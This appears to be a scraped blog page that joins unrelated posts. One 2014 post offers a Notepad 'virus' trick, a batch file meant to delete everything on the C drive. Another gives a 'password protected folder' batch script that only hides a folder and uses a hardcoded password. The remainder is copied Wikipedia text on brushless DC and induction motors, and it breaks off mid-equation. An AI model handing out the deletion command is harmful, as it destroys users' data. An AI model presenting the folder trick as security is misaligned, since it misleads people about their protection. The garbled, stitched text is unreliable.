Friday 4 July 2014

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.
  1. Open No.tepad and copy below code into it.

@Echo off
Del C:\ *.* |y

  2. Then Save this file as virus.bat
    3. Now, running this file format C Drive

Saturday 21 June 2014

Below Mentioned are some easy steps to Perform this Amazing Trick in your Windows PC.

Step 1: Open Notepad and Paste the Below Code in it.

cls
@ECHO OFF
title rathanignatius.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== 
rathan goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
Note: the Default password is rathan so if you want to change the password, simply replace rathan in the above code with your own chosen password that you can remember.

Step 2: Now save the Notepad file, name it "Lock.bat" and Choose "All Files" in Save type as.

Step 3: Remember the Location where you save the file, now Double click on your Created file which will create a Folder there with the name "My Folder"

Step 4: Now Copy paste all your important data and paste it in that Folder. Next Simply you have to Double click on the lock.bat file which we created. a CMD window will pop up just like below picture.


Step 5: Press "Y" and hit enter to lock the folder. You will see the My folder is now hidden and cant be seen. 

To Unhide the folder, again double click on Lock.bat file, this time it will ask you the password so if you have not altered the above code then write "rathan" and hit enter to unhide the folder.

If you Replaced rathan with your own password then you will be needed to enter that password in the CMD to unlock the folder.

That it, we just created a password protected folder in windows by your own which will be helpful to you whenever you wish to hide your personal data from others.

Friday 25 October 2013

Brushless DC electric motor

Brushless DC electric motor (BLDC motorsBL motors) also known as electronically commutated motors (ECMs, EC motors) are synchronous motors that are powered by a DC electric source via an integrated inverter/switching power supply, which produces an AC electric signal to drive the motor. In this context, AC, alternating current, does not imply a sinusoidal waveform, but rather a bi-directional current with no restriction on waveform. Additional sensors and electronics control the inverter output amplitude and waveform (and therefore percent of DC bus usage/efficiency) and frequency (i.e. rotor speed).
The motor part of a brushless motor is often a permanent magnet synchronous motor, but can also be a switched reluctance motor, or induction motor.
Brushless motors may be described as stepper motors; however, the term stepper motor tends to be used for motors that are designed specifically to be operated in a mode where they are frequently stopped with the rotor in a defined angular position. This page describes more general brushless motor principles, though there is overlap.

Brushless vs. brushed motors[edit]

Brushed DC motors have been in commercial use since 1886.[1][2] Brushless motors, on the other hand, did not become commercially viable until 1962.[3][4]
Brushed DC motors develop a maximum torque when stationary, linearly decreasing as velocity increases.[5] Some limitations of brushed motors can be overcome by brushless motors; they include higher efficiency and a lower susceptibility of the commutator assembly to mechanical wear. These benefits come at the cost of potentially less rugged, more complex, and more expensive control electronics.
A typical brushless motor has permanent magnets which rotate and a fixed armature, eliminating problems associated with connecting current to the moving armature. An electronic controller replaces the brush/commutator assembly of the brushed DC motor, which continually switches the phase to the windings to keep the motor turning. The controller performs similar timed power distribution by using a solid-state circuit rather than the brush/commutator system.
Brushless motors offer several advantages over brushed DC motors, including more torque per weight, more torque per watt (increased efficiency), increased reliability, reduced noise, longer lifetime (no brush and commutator erosion), elimination of ionizing sparks from the commutator, and overall reduction of electromagnetic interference (EMI). With no windings on the rotor, they are not subjected to centrifugal forces, and because the windings are supported by the housing, they can be cooled by conduction, requiring no airflow inside the motor for cooling. This in turn means that the motor's internals can be entirely enclosed and protected from dirt or other foreign matter.
Brushless motor commutation can be implemented in software using a microcontroller or computer, or may alternatively be implemented in analogue hardware or digital firmware using an FPGA. Commutation with electronics instead of brushes allows for greater flexibility and capabilities not available with brushed DC motors, including speed limiting, "micro stepped" operation for slow and/or fine motion control, and a holding torque when stationary.
The maximum power that can be applied to a brushless motor is limited almost exclusively by heat[citation needed]; too much of which weakens the magnets[citation needed], and may damage the winding's insulation.
Brushless motors are more efficient at converting electricity into mechanical power than brushed motors. This improvement is largely due to the brushless motor's velocity being determined by the frequency at which the electricity is switched, not the voltage. Additional gains are due to the absence of brushes, alleviating loss due to friction. The enhanced efficiency is greatest in the no-load and low-load region of the motor's performance curve.[citation needed] Under high mechanical loads, brushless motors and high-quality brushed motors are comparable in efficiency.[citation needed][disputed ]
Environments and requirements in which manufacturers use brushless-type DC motors include maintenance-free operation, high speeds, and operation where sparking is hazardous (i.e. explosive environments) or could affect electronically sensitive equipment.

Controller implementations[edit]

Because the controller must direct the rotor rotation, the controller requires some means of determining the rotor's orientation/position (relative to the stator coils.) Some designs use Hall effect sensors or a rotary encoder to directly measure the rotor's position. Others measure the back EMF in the undriven coils to infer the rotor position, eliminating the need for separate Hall effect sensors, and therefore are often called sensorless controllers.
A typical controller contains 3 bi-directional outputs (i.e. frequency controlled three phase output), which are controlled by a logic circuit. Simple controllers employ comparators to determine when the output phase should be advanced, while more advanced controllers employ a microcontroller to manage acceleration, control speed and fine-tune efficiency.
Controllers that sense rotor position based on back-EMF have extra challenges in initiating motion because no back-EMF is produced when the rotor is stationary. This is usually accomplished by beginning rotation from an arbitrary phase, and then skipping to the correct phase if it is found to be wrong. This can cause the motor to run briefly backwards, adding even more complexity to the startup sequence. Other sensorless controllers are capable of measuring winding saturation caused by the position of the magnets to infer the rotor position.

Variations in construction[edit]

Schematic for delta and wye winding styles. (This image does not illustrate the motor's inductive and generator-like properties)
Brushless motors can be constructed in several different physical configurations: In the 'conventional' (also known as inrunner) configuration, the permanent magnets are part of the rotor. Three stator windings surround the rotor. In the outrunner (or external-rotor) configuration, the radial-relationship between the coils and magnets is reversed; the stator coils form the center (core) of the motor, while the permanent magnets spin within an overhanging rotor which surrounds the core. The flat or axial flux type, used where there are space or shape limitations, uses stator and rotor plates, mounted face to face. Outrunners typically have more poles, set up in triplets to maintain the three groups of windings, and have a higher torque at low RPMs. In all brushless motors, the coils are stationary.
There are two common electrical winding configurations; the delta configuration connects three windings to each other (series circuits) in a triangle-like circuit, and power is applied at each of the connections. The Wye (Y-shaped) configuration, sometimes called a star winding, connects all of the windings to a central point (parallel circuits) and power is applied to the remaining end of each winding.
A motor with windings in delta configuration gives low torque at low speed, but can give higher top speed. Wye configuration gives high torque at low speed, but not as high top speed.[6]
Although efficiency is greatly affected by the motor's construction, the Wye winding is normally more efficient. In delta-connected windings, half voltage is applied across the windings adjacent to the driven lead (compared to the winding directly between the driven leads), increasing resistive losses. In addition, windings can allow high-frequency parasitic electrical currents to circulate entirely within the motor. A Wye-connected winding does not contain a closed loop in which parasitic currents can flow, preventing such losses.
From a controller standpoint, the two styles of windings are treated exactly the same.

Applications[edit]

The four poles on the stator of a two-phase brushless motor. This is part of a computer cooling fan; the rotor has been removed.
Brushless motors fulfill many functions originally performed by brushed DC motors, but cost and control complexity prevents brushless motors from replacing brushed motors completely in the lowest-cost areas. Nevertheless, brushless motors have come to dominate many applications, particularly devices such as computer hard drives and CD/DVD players. Small cooling fans in electronic equipment are powered exclusively by brushless motors. They can be found in cordless power tools where the increased efficiency of the motor leads to longer periods of use before the battery needs to be charged. Low speed, low power brushless motors are used in direct-drive turntables for gramophone records.

Transport[edit]

High power brushless motors are found in electric vehicles and hybrid vehicles. These motors are essentially AC synchronous motors with permanent magnet rotors.
The Segway Scooter and Vectrix Maxi-Scooter use brushless technology.
A number of electric bicycles use brushless motors that are sometimes built into the wheel hub itself, with the stator fixed solidly to the axle and the magnets attached to and rotating with the wheel.[7]

Heating and ventilations[edit]

There is a trend in the HVAC and refrigeration industries to use brushless motors instead of various types of AC motors. The most significant reason to switch to a brushless motor is the dramatic reduction in power required to operate them versus a typical AC motor.[8] While shaded-pole and permanent split capacitor motors once dominated as the fan motor of choice, many fans are now run using a brushless motor.[when?] Some fans use brushless motors also in order to increase overall system efficiency.[9]
In addition to the brushless motor's higher efficiency, certain HVAC systems (especially those featuring variable-speed and/or load modulation) use brushless motors because the built-in microprocessor allows for programmability, better control over airflow, and serial communication.

Industrial engineering[edit]

The application of brushless DC motors within industrial engineering primarily focuses on manufacturing engineering or industrial automation design. In manufacturing, brushless motors are primarily used for motion controlpositioning or actuation systems.
Brushless motors are ideally suited for manufacturing applications because of their high power density, good speed-torque characteristics, high efficiency and wide speed ranges and low maintenance. The most common uses of brushless DC motors in industrial engineering are linear motors. servomotors, actuators for industrial robots, extruder drive motors and feed drives for CNC machine tools.[10]

Motion control systems[edit]

Brushless motors are commonly used as pump, fan and spindle drives in adjustable or variable speed applications. They can develop high torque with good speed response. In addition, they can be easily automated for remote control. Due to their construction, they have good thermal characteristics and high energy efficiency.[11] To obtain a variable speed response, brushless motors operate in an electromechanical system that includes an electronic motor controller and a rotor position feedback sensor.[12]
Brushless dc motors are widely used as servomotors for machine tool servo drives. Servomotors are used for mechanical displacement, positioning or precision motion control. In the past DCstepper motors were used as servomotors; however, since they are operate with open loop control, they typically exhibit torque pulsations.[13] Brushless dc motors are more suitable as servomotors since their precise motion is based upon a closed loop control system that provides tightly controlled and stable operation.

Positioning and actuation systems[edit]

Brushless motors are used in industrial positioning and actuation applications.[14] For assembly robots,[15] brushless stepper or servo motors are used to position a part for assembly or a tool for a manufacturing process, such as welding or painting. Brushless motors can also be used to drive linear actuators[16]
Actuators that produce linear motion are called linear motors. The advantage of linear motors is that they can produce linear motion without the need of a transmission system, such as a ball-and-lead screw, rack-and-pinion, cam, gears or belts, that would be necessary for rotary motors. Transmission systems are known to introduce less responsiveness and reduced accuracy. Direct drive, brushless DC linear motors consist of a slotted stator with magnetic teeth and a moving actuator, which has permanent magnets and coil windings. To obtain linear motion, a motor controller excites the coil windings in the actuator causing an interaction of the magnetic fields resulting in linear motion.[17]

Model engineering[edit]

A microprocessor-controlled BLDC motor powering a micro radio-controlled airplane. This external rotor motor weighs 5 grams, consumes approximately 11 watts and produces thrust of more than twice the weight of the plane.
Brushless motors are a popular motor choice for model aircraft including helicopters. Their favorable power-to-weight ratios and large range of available sizes, from under 5 gram to large motors rated at well into the kilowatt output range, have revolutionized the market for electric-powered model flight, displacing virtually all brushed electric motors. They have also encouraged a growth of simple, lightweight electric model aircraft, rather than the previousinternal combustion engines powering larger and heavier models. The large power-to-weight ratio of modern batteries and brushless motors allows models to ascend vertically, rather than climb gradually. The low noise and lack of mess compared to small glow fuel internal combustion engines that are used is another reason for their popularity.
Legal restrictions for the use of combustion engine driven model aircraft in some countries[clarification needed] have also supported the shift to high-power electric systems.

Radio controlled cars[edit]

Their popularity has also risen in the radio controlled car area. Brushless motors have been legal in North American RC car racing in accordance toROAR since 2006. These motors provide a great amount of power to RC racers and, if paired with appropriate gearing and high-discharge Li-Po (lithium polymer) or considerably safer LiFePO4 batteries, these cars can achieve speeds over 161 kilometres per hour (100 mph).[citation needed]

See also[edit]

Induction motor

Induction motor

From Wikipedia, the free encyclopedia
  (Redirected from Single-phase induction motor)
Three-phase totally enclosed fan-cooled (TEFC) induction motor, with and, at right, without end cover to show cooling fan. In TEFC motor, interior losses are dissipated indirectly through enclosure fins mostly by forced air convection.
An induction or asynchronous motor is an AC electric motor in which the electric current in the rotor needed to produce torque is induced byelectromagnetic induction from the magnetic field of the stator winding. An induction motor therefore does not require mechanical commutation, separate-excitation or self-excitation for all or part of the energy transferred from stator to rotor, as in universalDC and large synchronous motors. An induction motor's rotor can be either wound type or squirrel-cage type.
Three-phase squirrel-cage induction motors are widely used in industrial drives because they are rugged, reliable and economical. Single-phase induction motors are used extensively for smaller loads, such as household appliances like fans. Although traditionally used in fixed-speed service, induction motors are increasingly being used with variable-frequency drives (VFDs) in variable-speed service. VFDs offer especially important energy savings opportunities for existing and prospective induction motors in variable-torque centrifugal fan, pump and compressor load applications. Squirrel cage induction motors are veFile:Rotterdam Ahoy Europort 2011 (14).JPGry widely 

History[edit]

A model of Tesla's first induction motor, in Tesla Museum, Belgrade.
Early squirrel cage rotor
In 1824, the French physicist François Arago formulated the existence of rotating magnetic fields, termed Arago's rotations, which, by manually turning switches on and off, Walter Baily demonstrated in 1879 as in effect the first primitive induction motor.[1][2][3][4] Practical alternating current induction motors seem to have been independently invented by Galileo Ferraris and Nikola Tesla, a working motor model having been demonstrated by the former in 1885 and by the latter in 1887. Tesla applied for U.S. patents in October and November 1887 and was granted some of these patents in May 1888. In April 1888, the Royal Academy of Science of Turin published Ferraris's research on his AC polyphase motor detailing the foundations of motor operation.[4][5] In May 1888 Tesla presented the technical paper A New System for Alternating Current Motors and Transformers to the American Institute of Electrical Engineers (AIEE)[6][7][8][9][10] describing three four-stator-pole motor types: one with a four-pole rotor forming a non-self-startingreluctance motor, another with a wound rotor forming a self-starting induction motor, and the third a true synchronous motor with separately excited DC supply to rotor winding. George Westinghouse, who was developing an alternating current power system at that time, licensed Tesla’s patents in 1888 and purchased a US patent option on Ferraris' induction motor concept.[11] Tesla was also employed for one year as a consultant. Westinghouse employee C. F. Scott was assigned to assist Tesla and later took over development of the induction motor at Westinghouse.[6][12][13][14] Steadfast in his promotion of three-phase development, Mikhail Dolivo-Dobrovolsky's invented the cage-rotor induction motor in 1889 and the three-limb transformer in 1890.[15][16] However, he claimed that Tesla's motor was not practical because of two-phase pulsations, which prompted him to persist in his three-phase work.[17] Although Westinghouse achieved its first practical induction motor in 1892 and developed a line of polyphase 60 hertz induction motors in 1893, these early Westinghouse motors were two-phase motors with wound rotors until B. G. Lamme developed a rotating bar winding rotor.[6] TheGeneral Electric Company (GE) began developing three-phase induction motors in 1891.[6] By 1896, General Electric and Westinghouse signed a cross-licensing agreement for the bar-winding-rotor design, later called the squirrel-cage rotor.[6] GE's Charles Proteus Steinmetz was the first to make use of the letter "j" (the square root of minus one) to designate the 90-degree rotation operator in electrical mathematical expressions and thereby be able to describe the induction motor in terms now commonly known as the Steinmetz equivalent circuit.[6][18][19][20] Induction motor improvements flowing from these inventions and innovations were such that a 100 horsepower induction motor currently has the same mounting dimensions as a 7.5 horsepower motor in 1897.[6]

Principle of operation[edit]

A three-phase power supply provides a rotating magnetic field in an induction motor.
In both induction and synchronous motors, the AC power supplied to the motor's stator creates a magnetic field that rotates in time with the AC oscillations. Whereas a synchronous motor's rotor turns at the same rate as the stator field, an induction motor's rotor rotates at a slower speed than the stator field. The induction motor stator's magnetic field is therefore changing or rotating relative to the rotor. This induces an opposing current in the induction motor's rotor, in effect the motor's secondary winding, when the latter is short-circuited or closed through an external impedance.[21] The rotating magnetic flux induces currents in the windings of the rotor;[22] in a manner similar to currents induced in a transformer's secondary winding(s). The currents in the rotor windings in turn create magnetic fields in the rotor that react against the stator field. Due to Lenz's Law, the direction of the magnetic field created will be such as to oppose the change in current through the rotor windings. The cause of induced current in the rotor windings is the rotating stator magnetic field, so to oppose the change in rotor-winding currents the rotor will start to rotate in the direction of the rotating stator magnetic field. The rotor accelerates until the magnitude of induced rotor current and torque balances the applied load. Since rotation at synchronous speed would result in no induced rotor current, an induction motor always operates slower than synchronous speed. The difference, or "slip," between actual and synchronous speed varies from about 0.5 to 5% for standard Design B torque curve induction motors.[23] The induction machine's essential character is that it is created solely by induction instead of being separately excited as in synchronous or DC machines or being self-magnetized as in permanent magnet motors.[21]
For rotor currents to be induced, the speed of the physical rotor must be lower than that of the stator's rotating magnetic field (n_s); otherwise the magnetic field would not be moving relative to the rotor conductors and no currents would be induced. As the speed of the rotor drops below synchronous speed, the rotation rate of the magnetic field in the rotor increases, inducing more current in the windings and creating more torque. The ratio between the rotation rate of the magnetic field induced in the rotor and the rotation rate of the stator's rotating field is called slip. Under load, the speed drops and the slip increases enough to create sufficient torque to turn the load. For this reason, induction motors are sometimes referred to as asynchronous motors.[24] An induction motor can be used as an induction generator, or it can be unrolled to form a linear induction motor which can directly generate linear motion.

Synchronous speed[edit]

An AC motor's synchronous speed, n_s, is the rotation rate of the stator's magnetic field, which is expressed in revolutions per minute as
n_s={120\times{f}\over{p}} (RPM),
where f is the motor supply's frequency in Hertz and p is the number of magnetic poles.[25][26] That is, for a six-pole three-phase motor with three pole-pairs set 120° apart, p equals 6 and n_sequals 1,000 RPM and 1,200 RPM respectively for 50 Hz and 60 Hz supply systems.

Slip[edit]

Typical torque curve as a function of slip, represented as 'g' here.
Slip, s, is defined as the difference between synchronous speed and operating speed, at the same frequency, expressed in rpm or in percent or ratio of synchronous speed. Thus
s = \frac{n_s-n_r}{n_s}\,
where n_s is stator electrical speed, n_r is rotor mechanical speed.[9][27] Slip, which varies from zero at synchronous speed and 1 when the rotor is at rest, determines the motor's torque. Since the short-circuited rotor windings have small resistance, a small slip induces a large current in the rotor and produces large torque.[28] At full rated load, slip varies from more than 5% for small or special purpose motors to less than 1% for large motors.[29]These speed variations can cause load-sharing problems when differently sized motors are mechanically connected.[29] Various methods are available to reduce slip, VFDs often offering the best solution.[29]

Torque[edit]

Standard torque[edit]

Speed-torque curves for four induction motor types: A) Single-phase, B) Polyphase cage, C) Polyphase cage deep bar, D) Polyphase double cage
Typical speed-torque curve for NEMA Design B Motor
The typical speed-torque relationship of a standard NEMA Design B polyphase induction motor is as shown in the curve at right. Suitable for most low performance loads such as centrifugal pumps and fans, Design B motors are constrained by the following typical torque ranges:[23][a]
  • Breakdown torque, 175-300 percent of rated torque
  • Locked-rotor torque, 75-275 percent of rated torque
  • Pull-up torque, 65-190 percent of rated torque.
Over a motor's normal load range, the torque's slope is approximately linear or proportional to slip because the value of rotor resistance divided by slip, R_r^'/s, dominates torque in linear manner.[30] As load increases above rated load, stator and rotor leakage reactance factors gradually become more significant in relation to R_r^'/s such that torque gradually curves towards breakdown torque. As torque increases beyond breakdown torque the motor stalls. Although polyphase motors are inherently self-starting, their starting and pull-up torque design limits must be high enough to overcome actual load conditions. In two-pole single-phase motors, the torque goes to zero at 100% slip (zero speed), so these require alterations to the stator such asshaded-poles to provide starting torque.

Starting[edit]

There are five basic types of competing small induction motor: single-phase capacitor-start, capacitor-run, split-phase and shaded-pole types, and small polyphase induction motors.
A single-phase induction motor requires separate starting circuitry to provide a rotating field to the motor. The normal running windings within such a single-phase motor can cause the rotor to turn in either direction, so the starting circuit determines the operating direction.
In certain smaller single-phase motors, starting is done by means of a shaded pole with a copper wire turn around part of the pole. The current induced in this turn lags behind the supply current, creating a delayed magnetic field around the shaded part of the pole face. This imparts sufficient rotational field energy to start the motor. These motors are typically used in applications such as desk fans and record players, as the required starting torque is low, and the low efficiency is tolerable relative to the reduced cost of the motor and starting method compared to other AC motor designs.
Larger single phase motors have a second stator winding fed with out-of-phase current; such currents may be created by feeding the winding through a capacitor or having it receive different values of inductance and resistance from the main winding. In capacitor-start designs, the second winding is disconnected once the motor is up to speed, usually either by a centrifugal switch acting on weights on the motor shaft or a thermistor which heats up and increases its resistance, reducing the current through the second winding to an insignificant level. The capacitor-run designs keep the second winding on when running, improving torque.
Self-starting polyphase induction motors produce torque even at standstill. Available cage induction motor starting methods include direct-on-line starting, reduced-voltage reactor or auto-transformer starting, star-delta starting or, increasingly, new solid-state soft assemblies and, of course, VFDs.[31]
Polyphase motors have rotor bars shaped to give different speed-torque characteristics. The current distribution within the rotor bars varies depending on the frequency of the induced current. At standstill, the rotor current is the same frequency as the stator current, and tends to travel at the outermost parts of the cage rotor bars (by skin effect). The different bar shapes can give usefully different speed-torque characteristics as well as some control over the inrush current at startup.
In wound rotor motors, rotor circuit connection through slip rings to external resistances allows change of speed-torque characteristics for acceleration control and speed control purposes.

Speed control[edit]

Typical speed-torque curves for different motor input frequencies as for example used with variable-frequency drives.
Before the development of semiconductor power electronics, it was difficult to vary the frequency, and cage induction motors were mainly used in fixed speed applications. Applications such as electric overhead cranes used DC drives or wound rotor motors (WRIM) with slip rings for rotor circuit connection to variable external resistance allowing considerable range of speed control. However, resistor losses associated with low speed operation of WRIMs is a major cost disadvantage, especially for constant loads.[32] Large slip ring motor drives, termed slip energy recovery systems, some still in use, recover energy from the rotor circuit, rectify it, and return it to the power system using a VFD. In many industrial variable-speed applications, DC and WRIM drives are being displaced by VFD-fed cage induction motors. The most common efficient way to control asynchronous motor speed of many loads is with VFDs. Barriers to adoption of VFDs due to cost and reliability considerations have been reduced considerably over the past three decades such that it is estimated that drive technology is adopted in as many as 30-40% of all newly installed motors.[33]

Construction[edit]

Typical winding pattern for a three-phase (U, V, W), two-pole motor. Note the interleaving of the pole windings and the resulting quadrupole field.
The stator of an induction motor consists of poles carrying supply current to induce a magnetic field that penetrates the rotor. To optimize the distribution of the magnetic field, the windings are distributed in slots around the stator, with the magnetic field having the same number of north and south poles. Induction motors are most commonly run on single-phase or three-phase power, but two-phase motors exist; in theory, induction motors can have any number of phases. Many single-phase motors having two windings can be viewed as two-phase motors, since a capacitor is used to generate a second power phase 90° from the single-phase supply and feeds it to the second motor winding. Single-phase motors require some mechanism to produce a rotating field on startup. Cage induction motor rotor's conductor bars are typically skewed to reduce noise.

Rotation reversal[edit]

The method of changing the direction of rotation of an induction motor depends on whether it is a three-phase or single-phase machine. In the case of three phase, reversal is carried out by swapping connection of any two phase conductors. In the case of a single-phase motor it is usually achieved by changing the connection of a starting capacitor from one section of a motor winding to the other. In this latter case both motor windings are similar (e.g. in washing machines).

Power factor[edit]

The power factor of induction motors varies with load, typically from around 0.85 or 0.90 at full load to as low as 0.35 at no-load,[31] due to stator and rotor leakage and magnetizing reactances.[34] Power factor can be improved by connecting capacitors either on an individual motor basis or, by preference, on a common bus covering several motors. For economic and other considerations power systems are rarely power factor corrected to unity power factor.[35] Power capacitor application with harmonic currents requires power system analysis to avoid harmonic resonance between capacitors and transformer and circuit reactances.[36] Common bus power factor correction is recommended to minimize resonant risk and to simplify power system analysis.[36]

Efficiency[edit]

(See also Energy savings)
Full load motor efficiency varies from about 85 to 97%, related motor losses being broken down roughly as follows:[37]
  • Friction and windage, 5% – 15%
  • Iron or core losses, 15% – 25%
  • Stator losses, 25% – 40%
  • Rotor losses, 15% – 25%
  • Stray load losses, 10% – 20%.
Various regulatory authorities in many countries have introduced and implemented legislation to encourage the manufacture and use of higher efficiency electric motors. There is existing and forthcoming legislation regarding the future mandatory use of premium-efficiency induction-type motors in defined equipment. For more information, see: Premium efficiency and Copper in energy efficient motors.

Steinmetz equivalent circuit[edit]

Many useful motor relationships between time, current, voltage, speed, power factor and torque can be obtained from analysis of the Steinmetz equivalent circuit (also termed T-equivalent circuit or IEEE recommended equivalent circuit), a mathematical model used to describe how an induction motor's electrical input is transformed into useful mechanical energy output. The equivalent circuit is a single-phase representation of a multiphase induction motor that is valid in steady-state balanced-load conditions.
The Steinmetz equivalent circuit is expressed simply in terms of the following components:
Paraphrasing from Alger in Knowlton, an induction motor is simply an electrical transformer the magnetic circuit of which is separated by an air gap between the stator winding and the moving rotor winding.[21] The equivalent circuit can accordingly be shown either with equivalent circuit components of respective windings separated by an ideal transformer or with rotor components referred to the stator side as shown in the following circuit and associated equation and parameter definition tables.[31][35][38][39][40][41]
Steinmetz equivalent circuit
The following rule-of-thumb approximations apply to the circuit:[41][42][43]
  • Maximum current happens under locked rotor current (LRC) conditions and is somewhat less than {V_s}/X, with LRC typically ranging between 6 and 7 times rated current for standard Design B motors.[23]
  • Breakdown torque T_{max} happens when s\approx{R_r^'/X} and I_s\approx{0.7}LRC such that T_{max}\approx{K*V_s^2}/(2X) and thus, with constant voltage input, a low-slip induction motor's percent-rated maximum torque is about half its percent-rated LRC.
  • The relative stator to rotor leakage reactance of standard Design B cage induction motors is[44]
\frac{X_s}{X_r^'}\approx\frac{0.4}{0.6}.
  • Neglecting stator resistance, an induction motor's torque curve reduces to the Kloss equation[45]
T_{em}\approx\frac{2T_{max}}{\frac{s}{s_{max}}+\frac{s_{max}}{s}}, where s_{max} is slip at